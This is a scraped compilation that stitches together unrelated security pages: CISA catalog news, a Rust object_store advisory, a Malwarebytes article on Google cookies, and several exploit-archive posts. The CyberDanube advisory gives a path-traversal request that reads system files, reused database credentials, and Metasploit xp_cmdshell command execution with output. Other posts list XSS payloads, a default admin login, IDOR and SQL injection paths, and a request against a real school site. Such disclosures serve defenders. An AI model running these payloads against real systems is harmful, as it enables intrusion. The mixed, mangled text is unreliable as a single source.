The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerabilities are listed below -

CVE-2012-4792 (CVSS score: 9.3) - Microsoft Internet Explorer Use-After-Free Vulnerability
CVE-2024-39891 (CVSS score: 5.3) - Twilio Authy Information Disclosure

Vulnerability / Software Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The vulnerabilities are listed below -

*   **CVE-2012-4792** (CVSS score: 9.3) - Microsoft Internet Explorer Use-After-Free Vulnerability
*   **CVE-2024-39891** (CVSS score: 5.3) - Twilio Authy Information Disclosure Vulnerability

CVE-2012-4792 is a decade-old use-after-free vulnerability in Internet Explorer that could allow a remote attacker to execute arbitrary code via a specially crafted site.

It's currently not clear if the flaw has been subjected to renewed exploitation attempts, although it was abused as part of watering hole attacks targeting the Council on Foreign Relations (CFR) and Capstone Turbine Corporation websites back in December 2012.

On the other hand, CVE-2024-39891 refers to an information disclosure bug in an unauthenticated endpoint that could be exploited to "accept a request containing a phone number and respond with information about whether the phone number was registered with Authy."

Earlier this month, Twilio said it resolved the issue in versions 25.1.0 (Android) and 26.1.0 (iOS) after unidentified threat actors took advantage of the shortcoming to identify data associated with Authy accounts.

"These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise," CISA said in an advisory.

Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by August 13, 2024, to protect their networks against active threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Adds Twilio Authy and IE Flaws to Exploited Vulnerabilities List

Exposure of temporary credentials in logs in Apache Arrow Rust Object Store (`object_store` crate), version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens. 

On certain error conditions, the logs may contain the OIDC token passed to  AssumeRoleWithWebIdentity https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html . This allows someone with access to the logs to impersonate that identity, including performing their own calls to AssumeRoleWithWebIdentity, until the OIDC token expires. Typically OIDC tokens are valid for up to an hour, although this will vary depending on the issuer.

Users are recommended to use a different AWS authentication mechanism, disable logging or upgrade to version 0.10.2, which fixes this issue.

Details:

When using AWS WebIdentityTokens with the object_store crate, in the event of a failure and automatic retry, the underlying reqwest error, including the full URL with the credentials, potentially in the parameters, is written to the logs. 

Thanks to Paul Hatcherian for reporting this vulnerability

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-41178

**Apache Arrow Rust Object Store: AWS WebIdentityToken exposure in log files**

Moderate severity GitHub Reviewed Published Jul 23, 2024 to the GitHub Advisory Database • Updated Jul 24, 2024

**Package**

cargo object\_store (Rust)

**Affected versions**

\>= 0.5.0, < 0.10.2

Exposure of temporary credentials in logs in Apache Arrow Rust Object Store (object_store crate), version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens. 

On certain error conditions, the logs may contain the OIDC token passed to AssumeRoleWithWebIdentity https://docs.aws.amazon.com/STS/latest/APIReference/API\_AssumeRoleWithWebIdentity.html . This allows someone with access to the logs to impersonate that identity, including performing their own calls to AssumeRoleWithWebIdentity, until the OIDC token expires. Typically OIDC tokens are valid for up to an hour, although this will vary depending on the issuer.

Users are recommended to use a different AWS authentication mechanism, disable logging or upgrade to version 0.10.2, which fixes this issue.

Details:

When using AWS WebIdentityTokens with the object\_store crate, in the event of a failure and automatic retry, the underlying reqwest error, including the full URL with the credentials, potentially in the parameters, is written to the logs. 

Thanks to Paul Hatcherian for reporting this vulnerability

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-41178
*   https://lists.apache.org/thread/3t0povdppnt2czv6crlsqhvyko93kcrg
*   apache/arrow-rs#6074
*   apache/arrow-rs@4978e32
*   https://rustsec.org/advisories/RUSTSEC-2024-0358.html
*   http://www.openwall.com/lists/oss-security/2024/07/23/3

Published to the GitHub Advisory Database

Jul 23, 2024

Last updated

Jul 24, 2024

GHSA-c2hf-vcmr-qjrf: Apache Arrow Rust Object Store: AWS WebIdentityToken exposure in log files

Google has taken a new turn in the approach to eliminating third-party cookies. This time it's back to the Privacy Sandbox

For more than a year, Google has said it would phase out the third-party tracking cookies that power much of its advertising business online, proposing new ideas that would allegedly preserve user privacy while still providing businesses with steady revenue streams.

This week, Google tossed much of that work aside.

In an update about Google’s Privacy Sandbox, the tech giant said that due to feedback from authorities and other stakeholders in advertising, it is looking at a new path forward in finding the balance between privacy and an ad-supported internet.

The underlying grounds for the difficulty in finding the balance are not hard to understand. The effectiveness of advertising is determined by whether you’re able to reach your target audience, but the processes involved in determining whether a website visitor belongs to your target audience or not often means that the website publisher gathers information about said visitor, which can quickly become a privacy issue.

The common method to track a visitor’s online behavior was and still involves third-party cookies. You can look at them as small files that your browser drags along the internet while sites record your interests and online behavior in them. They are the reason why you suddenly see advertisements for an article you have looked at in an online store.

When the advertising industry collectively decided they needed something better than cookies, Google introduced the Privacy Sandbox  as a “secure environment for personalization that also protects user privacy.” The idea was to get rid of third-party cookies altogether.

Later, Google started experimenting with FLoC, or “Federated Learning of Cohorts.” FLoC aimed to become a privacy-focused solution intent on delivering relevant ads by clustering large groups of people with similar interests. This way, user behavior would be processed as anonymized accounts, grouped by interests. Most importantly, user information would processed on-device rather than broadcast across the web.

The idea was to get rid of third-party cookies by 2022, but the implementation of FLoC caused so much push-back from privacy experts that Google abandoned the idea.

Then Google came up with Topics, an idea based on Privacy Sandbox where the user does not get tracked based on the sites they visit, but where each site displays contextual advertising, which means the ads match with the content on the page. But Google had to ask websites not to abuse the topics API and other browser developers showed no interest in adopting the API.

Despite Google Chrome’s browser market share (>60%), it does not have the influence needed to persuade its competitors. And the pressure is on, since other browsers like Safari and Firefox went ahead and already started blocking third-party cookies. Ironic, because the push to eliminate third-party cookies was set in motion by Google and now it’s lagging behind.

So, Google is back with a new path for the Privacy Sandbox. It proposes:

> “An updated approach that elevates user choice. Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web browsing, and they’d be able to adjust that choice at any time.”

Strengthened with a new feature called IP Protection in Chrome’s Incognito Mode, this should protect the user from being identified by third parties as a potential target IP address for web-wide cross-site tracking.

Does that mean there will be yet another prompt asking the user what they want? It looks like it. But first, Google intends to put out its feelers to find out what regulators and the advertising industry have to say about this new approach.

We have a feeling that this will not be the end of this saga, and we will keep our readers informed about new developments.

**Summer mega sale**

Go into your vacation knowing you’re much more secure: This summer you can get a huge **50% off a Malwarebytes Standard subscription** or **Malwarebytes Identity bundle**. Run, don’t walk!

 Google admits it can&#8217;t quite quit third-party cookies 

Perten Instruments Process Plus Software versions 1.11.6507.0 and below suffer from local file inclusion, hardcoded credential, and execution with unnecessary privilege vulnerabilities.

    CyberDanube Security Research 20240722-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| Perten Instruments Process Plus Software   vulnerable version| <=1.11.6507.0        fixed version| 2.0.0           CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913               impact| High             homepage| https://perkinelmer.com                found| 2024-04-24                   by| S. Dietz, T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"For 85 years, PerkinElmer has pushed the boundaries of science from food tohealth to the environment. We’ve always pursued science with a clear purpose –to help our customers achieve theirs. Our expert team brings technology andintangibles, like creativity, empathy, diligence, and a spirit ofcollaboration, in equal measure, to fulfill our customers’ desire to workbetter, innovate better, and create better.PerkinElmer is a leading, global provider of technology and service solutionsthat help customers measure, quantify, detect, and report in ways that helpensure the quality, safety, and satisfaction of their products."Source: https://www.perkinelmer.com/Vulnerable versions-------------------------------------------------------------------------------ProcessPlus Software / <=1.11.6507.0Vulnerability overview-------------------------------------------------------------------------------1) Unauthenticated Local File Inclusion (CVE-2024-6911)A LFI was identified in the web interface of the device. An attacker can usethis vulnerability to read system-wide files and configuration.2) Hardcoded MSSQL Credentials (CVE-2024-6912)The software is using the same MSSQL credentials across multiple installations.In combination with 3), this allows an attacker to fully compromise the host.3) Execution with Unnecessary Privileges (CVE-2024-6913)The software uses the user "sa" to connect to the database. Access to thisaccount allows an attacker to execute commands via the "xp_cmdshell" procedure.Proof of Concept-------------------------------------------------------------------------------1) Unauthenticated Local File Inclusion (CVE-2024-6911)The LFI can be triggered by using the following GET Request:-------------------------------------------------------------------------------GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1Host: 192.168.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1-------------------------------------------------------------------------------This example returns the content from "C:\Windows\System32\drivers\etc\hosts"of an affected installation.2) Hardcoded MSSQL Credentials (CVE-2024-6912)Analysis across multiple installations show that the configuration file"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:-------------------------------------------------------------------------------[...]<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"appid="Perten.OPCDA.Server" loglevel="info"logfile="C:\Perten\ProcessPlus\Log\opcserver.log">[...]-------------------------------------------------------------------------------These credentials "sa:enilno" were re-used in all reviewed installations.3) Execution with Unnecessary Privileges (CVE-2024-6913)The application uses the "sa" user to authenticate with the database. By usingMetasploit an attacker can execute arbitrary commands:-------------------------------------------------------------------------------msf6 auxiliary(admin/mssql/mssql_exec) > show optionsModule options (auxiliary/admin/mssql/mssql_exec):   Name                 Current Setting   ----                 ---------------   CMD                  dir   PASSWORD             enilno   RHOSTS               192.168.0.1   RPORT                1433   TDSENCRYPTION        false   TECHNIQUE            xp_cmdshell   USERNAME             sa   USE_WINDOWS_AUTHENT  falsemsf6 auxiliary(admin/mssql/mssql_exec) > run[*] Running module against 192.168.0.1[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'[...] Directory of C:\Windows\system32 01/23/2024  13:37 AM    <DIR>          . 01/23/2024  13:37 AM    <DIR>          .. 01/23/2024  13:37 AM    <DIR>          0123 01/23/2024  13:37 AM    <DIR>          0123 01/23/2024  13:37 AM               232 @AppHelpToast.png 01/23/2024  13:37 AM               308 @AudioToastIcon.png[...]Solution-------------------------------------------------------------------------------Update to version 2.0.0.Workaround-------------------------------------------------------------------------------Restrict network access to the host with the installed software. Change thedefault credentials of the database in the config file and the database itself.Recommendation-------------------------------------------------------------------------------CyberDanube recommends Perten customers to upgrade the software to the latestversion available and to restrict network access to the management interface.Contact Timeline-------------------------------------------------------------------------------2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.2024-05-13: Vendor asked for unencrypted advisory.2024-05-16: Sent advisory to vendor.2024-05-22: Asked for status update. No answer.2024-05-28: Asked for status update. Contact stated that they are working on a            fix.2024-06-10: Asked for status update. Contact stated that all issues should be            fixed by end of month. Local file inclusion should be fixed in            version 1.16. Asked for a release date of version 1.16. No answer.2024-07-13: Asked for status update.2024-07-15: Contact stated, that all three issues have been fixed in version            2.0.0 which have been released on 2024-07-11.2024-07-16: Asked for a link to the firmware update release.2024-07-17: Set release date to 2024-07-22.2024-07-22: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF S. Dietz, T. Weber / @2024

Perten Instruments Process Plus Software 1.11.6507.0 LFI / Hardcoded Credentials

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

**LMS ZAI 6.1 Insecure Settings**

Posted Jul 23, 2024

Authored by indoushka

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ac6f91ffe20c571e57ac0c8a6aef0c5437b2d37e5f53c46ef41059f24100b7db

Download | Favorite | View

**LMS ZAI 6.1 Insecure Settings**

    ====================================================================================================================================| # Title     : LMS ZAI v6.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/lmszai-learning-management-system/38383087                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 123456[+] https://www/127.0.0.1/www.mylmsin/admin/dashboardGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

LMS ZAI 6.1 Insecure Settings

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

**Quick Job 2.4 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | ed619defcb18f94880d7fdc150758b05fc052d89b88cf6c32eda99ac714a326b

Download | Favorite | View

**Quick Job 2.4 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Quick Job v2.4 IDOR Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://bylancer.com/demo/quickjob/                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/newjobcartcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Quick Job 2.4 Insecure Direct Object Reference

PPDB ONLINE version 1.3 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : PPDB ONLINE V.1.3  HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://berkas.siap-ppdb.com/                                                                                      |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

PPDB ONLINE 1.3 Administrative Page Disclosure

PHP MaXiMuS version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP MaXiMuS v2.5.2 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://php-maximus.fr/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

PHP MaXiMuS 2.5.2 Cross Site Scripting

NUKE SENTINEL version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : NUKE SENTINEL v2.5.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.ravenphpscripts.com/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

NUKE SENTINEL 2.5.2 Cross Site Scripting

Minfotech CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Minfotech CMS v2.0 Sql injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://minfotech.in/AboutUs                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /project_list?name=stretch_films <===== inject here[+] https://www/127.0.0.1/shivexportnavsaricom/project_list?name=stretch_films[+] Login : /admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#auth